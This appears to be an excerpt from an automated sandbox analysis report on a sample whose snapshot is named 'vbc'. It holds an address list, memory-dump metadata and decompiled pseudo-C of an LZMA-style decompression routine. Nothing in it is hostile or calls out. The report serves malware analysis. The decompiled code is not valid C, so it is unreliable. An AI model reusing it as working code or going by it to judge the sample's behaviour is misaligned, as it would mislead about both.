0x00406cd8
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00000000
0x00000000
0x00406f10
0x00406f10
0x00406f14
0x00406f36
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f16
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00407018
0x00406fd3
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070be
0x004070c1
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc8
0x00000000
0x00406cf8
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00407018
0x00000000
0x00000000
0x00000000
0x00406d3d
0x00406d3d
0x00406d40
0x00406d76
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd6
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x0040713e
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00407042
0x0040700b

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F10 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F10() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
